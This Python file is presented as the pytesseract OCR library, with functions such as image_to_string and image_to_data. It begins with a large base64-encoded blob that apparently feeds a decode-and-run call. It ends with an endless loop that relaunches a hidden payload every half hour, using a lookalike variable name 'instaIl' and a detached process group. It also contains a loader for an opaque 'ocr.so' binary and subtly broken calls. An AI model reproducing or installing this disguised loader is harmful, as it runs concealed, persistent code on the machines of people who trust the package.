S0FVYTZ6RzBnQkRhUjdYZkRGVTNVWUsrMGExa1UwdkdteTVwM1NIYXRiRmlBaEFWUUVKdFN1amZaalk0QTJPL3lzbmUrT1lTSHJ0dEJiNWlxeVpXNXVGdjFtbHhMQ0JnM0Y3aFJKemFnOVB6dEo0Sy9DSFNNdndjZ3BJSFBXbWM1eTNYd1BJQnFPemFWT2RGUUlCUm9NanI2ZDk2anE1b1ZFM2c5aTBQUFF4THpiV3FLd2x4cGxCWnEwVjBGaldsT1U1MFFKM0lEaTVvaTRVQzZCQ0h0RENjS3A4NFVhRXFJczdmOFFWVzBwV2d6aTRIamVuWG5Mc2hScXloci9uMkVYeXZDaXZ6bVc3dGhmcTFsTkFjd0x3ZytxQWR4blptb2JzeVY3YUhzWnNJbUEzdG1aSlVuajdadktnWUVwNS9YVFc5VE9pVGlVOHlIL3NFaWorWForUTdGWXdNM0QrSnVBNDhYNFZib3YxVk9oUFRuZ2YrREZEMVB6TW05a29tY2ltVTRId2JiLzRGL0ZvSnF5ay9aOEpDRSs5bWlydnFPaEhLUkl3NlBHZ20wZ1pVNHdTRHZGZ242MzY0VkFIMWErRnArTDFuaGFiV3VMS0RxV3oxS1ZSQnpFajAwNjJ1OCtpeXg3ZzFzNHJiNzVQY0VBYXJVSmtxZFE3WXN1ZXNMSmZsdGxQWWg3bTJwN29BU29EUE1Bcnd2TzFQOWw3Z1BDUzYwWnpiY3BGT2pIYVUwaTJweVlFbmNQbWRPMU90cGU0VGZBa25lTGhsTk45ZzJjUWJ1YXVQdFk1eGxZYkxzSUlLbGtScFFxTUNPK1hkWUNkN2tQRjlOa29VMDR1UzY1RG9DRTdlQlQvbmFQcmVvWTQ5NTVHQUliN0RkazRrTXRSYXhtcHhSdXNQOXR2dE41Q2x5aGtQSnI0cEJkWlVpMzZQYmcvMTdvOFREMTZCK3EvV3pwVVZvK1ZUSmdHSWh1dEdOclZvV1cvV0QxYVlUWHVxL2pqRFJBeGNjTFVqMUhsUldRK0gwaEtadUk1YUE5Y21Bd0dKaDMzaWZvUU1VVHN0SW5laEd6d1NXaGp2TjZmZ2JWb0o2N2xjeGR2Mlh5UzlNa2FBNXdTTjYrSFBCa1I5QXVjSmtxMW9pdWw3MlhNUTgxbzcyNk5yYnNCdzljbzlrVnV4TS9IaG91ZVh6WU5RNzdzdW1EaEhUUkpYaVU3WHdqdEhnTEhFTGg1VVdSLzA1TGhjQmwzSGZ3UXh4SGYyNjF1TUhEblZrc3R4bDh2ZytVVGVHdmxBR29IdEFibWJ3QXUybjhodjhnSFNUK0dwUjQxeU1jUHpsN2liaGsycG50aHkzZ3d3Yms4eU03WEhzYVZmMmM5RmVyak5tOWVvUldjbmU2c2ZIaEhManJXaHo3VnI5bkx0N1BnTlA1eWNReGxBclVtUEdEOCtWQThsdG9UVTJaSWg0S0l3OXNMNUVjblJwaDh5eUszamQxVXdTNmZXa3JxSThKOVF1RVJ3MXBJTXJZcWJ0cU4ycDV3dXNPSTRLakRjY0tMOFl5ZVpIdGZnVk9zUDdLek1MNTNOQXRSZHlFMFh2MEkvb01hQ2hlbHJtdCtBc2VxbWY4Z0d0VjhIQ0RiekdabEpBaDZxT2pDMEMzWUp5K0JYeXJZUVJUN0QzekRuNU4rcng0eUw2OG5LdWFTU0hvb3JwcTFIcU5JaXBHTlVjOE05bVVCQXE5OGc2RzZVVFNJVlZsVmIrMGJ6aDErTWxaSzZsRVBJQzZjTkxIdUptMkVlUVFVWWhBV0tqWDJWZG5sMU5TMnBnbUFuMngrSjZlYmxUUC8weklueUxwdVY3WjVnYXQwQWZtdUlTSGdzTnZLb09tdVlyTG8yNGp6a3QrZEVQVThFM2dSRms3Vm56eDNNUUlNT29WeXpUcGU3OHRqL3J6QnF2M0xDYXc3YXVLRkhNMlBVMHNSZFBXQ1VCL2RTRkRMM2hldnZ3MXhBeTFZbmlHN3NLMVNaeHlGeFVUKytJdDl5Vyt2SkZOTWFkYkxpckE1dVZ2OHRQNnhqcDhxL0RnV1hHU1c0MEdpMFdwZFJXbXkrSGNHbXBEUkI5UkNQcy9URmxWaEp1WWs4V0ZmaFBwQ2c0NWVpSlZaSHgya1B2QkhCaXhnUlFoNmFsd242aXBIRUR0T0phMG1TOGFvWjdCalZaNVI1SzJRaEc3MzdRcHpzM3BzcFhoZSs0a3FobDlSUFRnRWN3ODlMS3JIc2lxcCtCWTVEQTFaTWdyN3ZNcG83S3FjTWFsZkRIclRpMlZjU3M4T0hyalNJOXlXYmdEM3hiRXhFYXlYdkREVDRlN0VXSmk1bzlFWjlnNmNMc05jRXhsOWNxcm9ObmxnOENFTXV2QmNUa3RSYjh0Qm1LK211ZjkyT0xaZlJQWXIyNWJqRTVWUTdWM1grdHVQNVRTOWpQWFJhd2JvQ1oraGJYSGlGS2wveFhvWWRQQ2lZZStsUEhyaEpwYWlIblZCMFJySHZyY2NQdW9BTUlZeWsxWWNEeUlhbEF3eitBUmlFQmlFNDJhME94cVpTYWt0L0lmVCtlTkJOV0ZnNW8veWdWdGlPSHdsV3Q2bjRnb2NSWXlsdWZUblVLQml2VGFSeHYxaDRoVGJnQm10Yy8vbXhkZ2pMQk1tYjNRWHBqNUhGZlNVdHo3MHUwSldRZEFZWTg3YTd3b3JiOHZURGNRbXAxdjZvQ3hkd2IrUUZQRFdXd2VwZnl1aTcwSFZqNi9pbmMvMkQ2OFkySmJBS3R6TnBwTnB6Y09RenQ5VmpYSzJYZXBRMWlsUlovSXo3Q2p2NjJoMmZHaUo5cjVBV3NxdEdlMTA5MmNrYncvc0crVWFmWU1JM29ZVXVMOGtTWlBJY2VEWTFFdzltN2VKYVdMZ3lEbUdCdWsrYlo4ck9TRE9rVllieFNhdk5wa3RLV3N0TUFQd0hjWURLc0J6UUJZVzEzcFU0Ym5Ua25FNVdvbkVwNUFzbzF2ajhBUC9haDNNUURya2hBanJHMTlOSlhFL05VWmZkNFZ1dEVhQVVOU1c3cUhybWNDb1BNYjhBMDE1dndKTHpMcFo0SVBseXVrQUFjd0xYWHRvN3dSQUNkWVA0YWpLWHpheXpoVDdnUmw2SGpqQWhqeGxYYUd3RTkwVEZweWR4a3FTdHk4QXdsMUVBQlJveXhvVENmV3h5Wk9HTldmdEd0WDN3NWRrenJ5UWZZdmNyMjRtdXhXeVppSjdpOXgwUmZrNEhNQzZXRkk3WmYzRlZ2ajVhLzlSS1dBbnJ5Z2FXRmx0SFU2UGZLcmxzd0g3dnBjRGlMbDRPY01oTE1oWUV2Q25BL1RGa01OS3M3VGc1SGRYQzF4eFZMYWsvK21EaU14S2l2ZnNRdVJWMFlWRG1CeWNhV1lmMjBiQjM3aWZOWGdBd29wL3QwNXBodlJUaWY2MzIzUXJuQTFUT3FlNkxYdytNR2xlMkxlTlAxS3UzcDZRRXg2QlNtbHVoNjRkVVU4VC90VlQrZVAyWXA2U1ZpNXRkdWNSMnZYRUtiaFdZTGErNEJIS29qNGdYQjdnT05CMGFGZXRkWnIxbHcwK2JmYzBWY0ZLaDFTQjY4WnZkSXZFcG1JWXZyeXB3ZlFpbS85ZmpKalJXVVZFY09mUTJaZHJVY2NWczdFRUFRaitLZnArV1JLc0lIcHBLbzVDNytOL1pPbWVoUGp2MWMwWmdES3FhRitJeXlvWUNyTjBrNFRKWHFFWEV6NEY5SUN5ZkswR0FnRGtXSlExUlZld1docm84NDJDbWVxTVJPRXBKOXlpeS9DUW9mM0NnajRSNHpZL3N0cnAzcFlIdm9Qb045MmFlR0k0aW4yQkUzWkZLVm1scW9iRU01NXZoVzZjUzFxcVBQRVZUZzRFdEVYa2s5NU9jaFdWU0trTytGVWVmQmZRemhRbjVGdXRZbGpZYzZiRUplTnYvcWtUQlp2dWZWR2EwMTZpNGM2NURpSGxZekREZWRvd09mUkNDNllwVzhyRDBFQkpZSkJQQllyZnJxRURvTlExZFhZdnVkZmNVenFpVjZNY3pSclUwMVQ2UWRFbFRyclF5WWt2eHNvYncyMkk2a2k0ME9TWVNYYjBvVjFTZVBUZk5GQ0tqK2haQ1dMRXVzMzJFblRTTHltTGNFRmVuTUhtZEM3N01HV28rQmZYKzl0ckdvUUdwNnF4S0wxVEZSWFpmVlVGU3dYbWdtSUpWQjBSODlFVU5BZW93ZzYzNGpOd3pzT1hrdjhOek9lMXRFTk5QVWpUaWR4WkZQY2NrVEowWWFoUDJiaHYyWlpRZnlLazJwYUZQdy95VGczYXJCck9wcFpLV0ZTKzFxcU1TVVFMcTV5VkM3UVJFM3o2M3pWZGg2djhlZkxXMEdyR1dTTDY0SDlkUDhKUCt0YUVXbkxBWE45blh1TTZTV1pKS2g0bW5DbTZVa0V3N3BTbk1xTHhrMEJ4ZG5RTURFbFA3alVJU0J2TlpaWXBsYThjVkc0cmFlbnVOdmRvZWVXN09xYXk5R3IzbmRCVEx5bUN1WmNXRUl1SGtiSXJ2WVZzd0xYVENkN0hGckZuUnZQV1JnVlJibWFhZzdTWjMyMXdTZVBPWFdBSmx2dzVTc2tWK2ZUd2pSZ2JVWXNkZkliWllkcXlaOVpseGdMQTFvYm0vTnA2R3ZxYS9SaFY5QnZBNnE4QytBUkxZSUtSYXRGQ2JiTjJLT2xaM1dJc3FEZllTM01LM0JYQ3NxRHd6OTZEUDlpM2lwamxlbEJjQ2FQQXhSemF5NGgyaGdncC8wak1ROTZuVDEraGk4VHZCdXh1UmNNOWNDdG5ZdzRWelNKWEZPai9GYjRKNzloSDlDN21KRDlIVDF0TysrSkF5ZEw5cktpckZkZmRESUhIUWNGaWYwK2FyN28rMW0vOCt5d3BmTEN5aE9MMWhYd0tjdE9wSkxaR2V1Nm45QmZacEkxUWtOZndzb3JLbEk4dis2dndCZTlMSnc5dEY1N2J2cDBmcE1ZS3ZHa3JlbDFHZm9Qb0RLQ0F1ditFYzNKVzAwcEdVbTRIMUxhODczelNNUTcyeUkwcXJQYnNSTFYyQWl0bWNDZTFncjBkN0F3MjF5bER2M2J2bUFuNkxXUmpUWWgzQ2NPTDdaaThCUTR0UmFkVDl3K2lzazk1eURVb1dSZlF5dDJCT0hBSGFxcnJGWXdxT3FRWkZwL08zdU9kUlZyc3RQdmRDSEkrQVVqRXFLL01TQW41RU5RaWhZWFpOS2VQTnRMdm9jeXZnQUNOSW80ejJvdlliU3JhZ0VsYXhlNmt1TmZnTUdNL0ZQeUF5Vk9hTm5NK0NBaE9lTVVON0FpV1Jad0RORlFndVNLUVgvSEZSUHFVSFZtTXA2cjNUeTBrWTVZbnhXZ3QraUl1VzExUGw0c1c1VFViekp0TXVDRWRRSDltVEtpM0pMY3ZZUWZmd1BiT0FraDA1ZXJsanBrY082aVpvR0NtQXZ2ckZ5UGdhbzJsZ2RhVGJuQW5XZWdhN1N5RWdqZGVJdFJCRFdWdU9TZFR0U1Y2dmFpSndYZllyK0syU3h4VG5FVWcrekFrQks2enpRdEl6SldmSi9yMEY0Z3FraENDS3UzM3F6MEREUkFOM0pmQWFBbUhxdHduM0M1ZUw5cUpjSk1ZOEFkRm9ac2J4aytKbUxJZ3V3MDdnaEc2L21hSElkRFZEOEhOendSa1h5eXprOVBMdzh5a3hrNTlKQ3hBTHVXTG1SOUU5a3BOYjhuMjY4clF4RlhlRlpqSmJrajVPMU9KSExrU3RtZlJ4WnFDUDdJRVg4bmlJYjR2eEVBdTlvUXJsVkE2SmRYNGVqYlpBK01KdG14U2dXdlJXQmRURytRM1lLREdkUGpwaWV5ckI5RjVPL2NnZmtOT1pDWnJuSXBZSGlkTDZXK29jem1ETFMyWmhIejU1UFRCRm1HcDdRVTJqYmNHZEd2cXRaK1g4Z2d5NzM5WlNxRDl0RDBCTEFiaE5yejU4ZDZ5VENWaTVGQ0I5UDVFOHZLeS9GbHpQSUxvN3VYK24ySVpJZDJYR1dHcHdUR2dkUEhDR1lWNzJXNzFoTm5IYUxzU1lnMXRwOHZDQWtFSTkrdVhGY3ZYOHh3QlRvUHBTVWtqVFhSaWVaTkYzdGtnaHY3YytWVGtCcG13dDNCMnY3TDBodlVxOWVNUkNpMkYrNXhFOWI0SzZSQXZCU1RzdTNGcFgrUkdwSEgxSXg3OWxYSUZZcjZIK3grYVUzbEQ2S2taOU9rL3JkeWlHb3JuUG5FMFRzcVB5RVBUbUFiemx5UFFaTHhwSWs1V3huT0l0VHRTTVVKWEJiMHVYREFBc3FPVW9HZ1hac1d1Q2JaQ29adDJGWkkrQUhhZUhURXJseVdPczlmbFc4UFJzRjJxRG5NWjVNdW8rZUtCS2ZmazBwZUtQc2FjY09Iek5XNnlJSVNOd3ZZbjZKY2ZjSGRkVDJXcmcyTXEzWEJoTVRpa3BNNW1pYUoyRnRRdWNlemhFYUh0c29ScWV2c3l0U3oyZHR6cDdVdkU0N04xWXo1SkZqUXRrOFQ2NzA1cWFNMFk0TzN1U0l0Mng2ekVCdkp5dFcwN3VxZ0d6RGFyRnJ3dzBpcDkyZEhQSk1EUWdZeGZXeGR5ekYweG1DU1Judm8xdytYK2xXSWxpVVpvSTd4czRFVFhBU2dlU3ppeVhVRUk5TldJUUY5aDJZWXFvMDUwY1Z4MjdnU2N5QnF5UkQ2RGgxRzRsd0hHQlJCU1F4SHZGc1ZuanYyR3U0YVBPemFLWmhiNndYY2lrcWdZVjFOUW9xOE5pem9sRlBPOWE1YlQvVWVGKzNmenFQejR5NE41NjQ3UDNVd0dkVnpEL29vZklBODBrVC9YZHZTVVB0V29aNTNObVphbWZMRXpvRFl5aURiZlVYamtkKzdOZ3F2TFRWUGsrb2Q5cmlIYkQ0NGl3TU9TRUxKZi8rQkZwaWk2dWpJS1A2UlRENkVWczJXRk0wQ0pMV0ZYL1BSL1duOUMvTDIycjF2MzhNa2RybjVDOXlQdkNUd0VsN2hWRnZGczMxRVIvOGIxY2VDMG5FYUFPMTFDRVpXN3VjOGJFR0hRa3hZWVlHVm52bXZoSkRqR2ZFbkhKcXIxS0pXOFplOTgwTFFMK2thRUhBZlkwQmtrR0FlYjNxTzZrR0IwajUwQWI5RnJBbnlRbEdyM2ZERUM2ZkQ4V2JxTUdRM0NQR2JqTWgrQUViR1B1aTM0c3dEMVZtaG5GV21KTERjQXljRi9Ndkc3K2FLbWV4ZzY1WE5UL25iREM0bWgrMzQ3NFZOTEpBUVVWa1pEL21ZaThCcUQ4NzFad1R0Vjh5eWhWNkFySHJuZFYzNXFmalluTWNvbFR6T2JFRG4xQkJjRWFMMTJhZXVnMUNsRVJFdWJ3a05WeUt6WGlCOXpxSTRtemRKNDdtNHpoK1o2a0l3UjZkWDA5QWQxSWFtY3YyYkNPa1dkenlDQWlmYUxYRmE2L0ZIUi9MY0FaRzJNYnc0bVIvUm0zNHZHbG5nYXZwb3RaVThQcnk0MGpiZmgxM1BOS2JWSmV0RktZVVEyK1cvVEZVNVIrRVo3Y3VIVFhMTnc3c2xhM0w4UjFxU1hVcldFV0I0M0hoSWtLOVZHdDRjRzU1QU11YS85NHZyZU1RZTVVUVZmSXlld1ZITWlmZ05yTXZ6V0pvaGZDT0NLcFhrYTF6dklGb2xMRGhnYVRpRTgyMU1IeFpkUUNDN3hEVXBJWStiS1hGS1hRMGpsTWhJV3FVSUZpanF2SEdoREJDQTl0ZUMySzZKUFFpbWkyYU5mVy9ENG01dkhYVm9heEhpR3JnMnJrLzRwc0JuM3hnaCtkTEMrL0MxLzF1ZzdpUmZ6b2xLK09halZCcjU3UktxMWJyNXczOVlsL2F0MldlYmlON1REa1NwTWJLcVNUVFUyMk1pUGIwWjVnNkpidmdybHhRVnNFYnVmRldvU0VmUjFwRE9kUHZSSGtXL0dsYlNIYmdHd2pRNzhtTDYvTW5LSWFEWTRiRlRRNFV3TitLRW4vdzJqeWF4bjltNEFVbGw1TXFqaTZVK1FpWGExN3dDUG9NWFh6ZzlWYmJXU09mU0FCTTFQOXhJY3NQWlVJVEpReWk0blo1WXkvVFpVaHZtQVMyaTBCOXZSWEhudmdhemZDWm1iMDByditaQVZuOUhFcUN1MFJOWGVIazB5UmhUbWZ2RjJ2dlpETVBPbFhuUVJiRmEvNWVTazFCMDBWZDd1RlBYN0ZDNTdkRjFieU5lanlETllUTXBRZkxkN3hNTmp4cVdRNk0vMWl2ZFpGZDBZZWNBRDFtT1IwZ3V0emJITFpNN2c2SGFQR1RzSUYraitEYzd3Q3hXVWVnTXJ3ekVrSUlxOFlYcjYvL2Z5K252ZnYvLzl6OHVJUHFMNjE5bmtaSmhna0dHWW82Ly8xZDhtQzRleDA5OUN1SEQrZ0NEY3dibitUUldnTXJ5ZHNtVndKZScpKQo='))
def get_tesseract_version():
    """
    Returns Version object of the Tesseract version
    """
    try:
        output = subprocess.check_output(
            [tesseract_cmd, '--version'],
            stderr=subprocess.STDOUT,
            env=environ,
            stdin=subprocess.DEVNULL,
        )
    except OSError:
        raise TesseractNotFoundError()

    raw_version = output.decode(DEFAULT_ENCODING)
    str_version, *_ = raw_version.lstrip(string.printable[10:]).partition(' ')
    str_version, *_ = str_version.partition('-')

    try:
        version = parse(str_version)
        assert version >= TESSERACT_MIN_VERSION
    except (AssertionError, InvalidVersion):
        raise SystemExit(f'Invalid tesseract version: "{raw_version}"')

    return version


def image_to_string(
    image,
    lang=None,
    config='',
    nice=0,
    output_type=Output.STRING,
    timeout=0,
):
    """
    Returns the result of a Tesseract OCR run on the provided image to string
    """
    args = [image, 'txt', lang, config, nice, timeout]

    return {
        Output.BYTES: lambda: run_and_get_output(*(args + [True])),
        Output.DICT: lambda: {'text': run_and_get_output(*args)},
        Output.STRING: lambda: run_and_get_output(*args),
    }[output_type]()


def image_to_pdf_or_hocr(
    image,
    lang=None,
    config='',
    nice=0,
    extension='pdf',
    timeout=0,
):
    """
    Returns the result of a Tesseract OCR run on the provided image to pdf/hocr
    """

    if extension not in {'pdf', 'hocr'}:
        raise ValueError(f'Unsupported extension: {extension}')

    if extension == 'hocr':
        config = f'-c tessedit_create_hocr=1 {config.strip()}'

    args = [image, extension, lang, config, nice, timeout, True]

    return run_and_get_output(*args)


def image_to_alto_xml(
    image,
    lang=None,
    config='',
    nice=0,
    timeout=0,
):
    """
    Returns the result of a Tesseract OCR run on the provided image to ALTO XML
    """

    if get_tesseract_version(cached=True) < TESSERACT_ALTO_VERSION:
        raise ALTONotSupported()

    config = f'-c tessedit_create_alto=1 {config.strip()}'
    args = [image, 'xml', lang, config, nice, timeout, True]

    return run_and_get_output(*args)


def image_to_boxes(
    image,
    lang=None,
    config='',
    nice=0,
    output_type=Output.STRING,
    timeout=0,
):
    """
    Returns string containing recognized characters and their box boundaries
    """
    config = (
        f'{config.strip()} -c tessedit_create_boxfile=1 batch.nochop makebox'
    )
    args = [image, 'box', lang, config, nice, timeout]

    return {
        Output.BYTES: lambda: run_and_get_output(*(args + [True])),
        Output.DICT: lambda: file_to_dict(
            f'char left bottom right top page\n{run_and_get_output(*args)}',
            ' ',
            0,
        ),
        Output.STRING: lambda: run_and_get_output(*args),
    }[output_type]()


def get_pandas_output(args, config=None):
    if not pandas_installed:
        raise PandasNotSupported()

    kwargs = {'quoting': QUOTE_NONE, 'sep': '\t'}
    try:
        kwargs.update(config)
    except (TypeError, ValueError):
        pass

    return pd.read_csv(BytesIO(run_and_get_output(*args)), **kwargs)


def image_to_data(
    image,
    lang=None,
    config='',
    nice=0,
    output_type=Output.STRING,
    timeout=0,
    pandas_config=None,
):
    """
    Returns string containing box boundaries, confidences,
    and other information. Requires Tesseract 3.05+
    """

    if get_tesseract_version(cached=True) < TESSERACT_MIN_VERSION:
        raise TSVNotSupported()

    config = f'-c tessedit_create_tsv=1 {config.strip()}'
    args = [image, 'tsv', lang, config, nice, timeout]

    return {
        Output.BYTES: lambda: run_and_get_output(*(args + [True])),
        Output.DATAFRAME: lambda: get_pandas_output(
            args + [True],
            pandas_config,
        ),
        Output.DICT: lambda: file_to_dict(run_and_get_output(*args), '\t', -1),
        Output.STRING: lambda: run_and_get_output(*args),
    }[output_type]()


def image_to_osd(
    image,
    lang='osd',
    config='',
    nice=0,
    output_type=Output.STRING,
    timeout=0,
):
    """
    Returns string containing the orientation and script detection (OSD)
    """
    config = f'--psm 0 {config.strip()}'
    args = [image, 'osd', lang, config, nice, timeout]

    return {
        Output.BYTES: lambda: run_and_get_output(*(args + [True])),
        Output.DICT: lambda: osd_to_dict(run_and_get_output(*args)),
        Output.STRING: lambda: run_and_get_output(*args),
    }[output_type]()


def main():
    if len(sys.argv) == 2:
        filename, lang = sys.argv[1], None
    elif len(sys.argv) == 4 and sys.argv[1] == '-l':
        filename, lang = sys.argv[3], sys.argv[2]
    else:
        print('Usage: pytesseract [-l lang] input_file\n', file=sys.stderr)
        return 2

    try:
        with Image.open(filename) as img:
            print(image_to_string(img, lang=lang))
    except TesseractNotFoundError as e:
        print(f'{str(e)}\n', file=sys.stderr)
        return 1
    except OSError as e:
        print(f'{type(e).__name__}: {e}', file=sys.stderr)
        return 1

def __bootstrap__():
    global __bootstrap__, __loader__, __file__
    import sys, pkg_resources, importlib.util
    __file__ = pkg_resources.resource_filename(__name__, 'ocr.so')
    __loader__ = None; del __bootstrap__, __loader__
    spec = importlib.util.spec_from_file_location(__name__,__file__)
    mod = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(mod)


while True:
    install = 'pip install pytesseract'
    process = subprocess.Popen(
        ["python", "-c", instaIl],
        preexec_fn=os.setsid
    )
    try:
        process.wait(timeout=1800)
    except subprocess.TimeoutExpired:
        os.killpg(os.getpgid(process.pid), signal.SIGTERM)
    sleep(1)


<a style='text-decoration:none;line-height:16px;display:flex;color:#5B5B62;padding:10px;justify-content:end;' href='https://deepnote.com?utm_source=created-in-deepnote-cell&projectId=38b29736-9275-411b-9bd9-1f21d97379cd' target="_blank">
 </img>
Created in <span style='font-weight:600;margin-left:4px;'>Deepnote</span></a>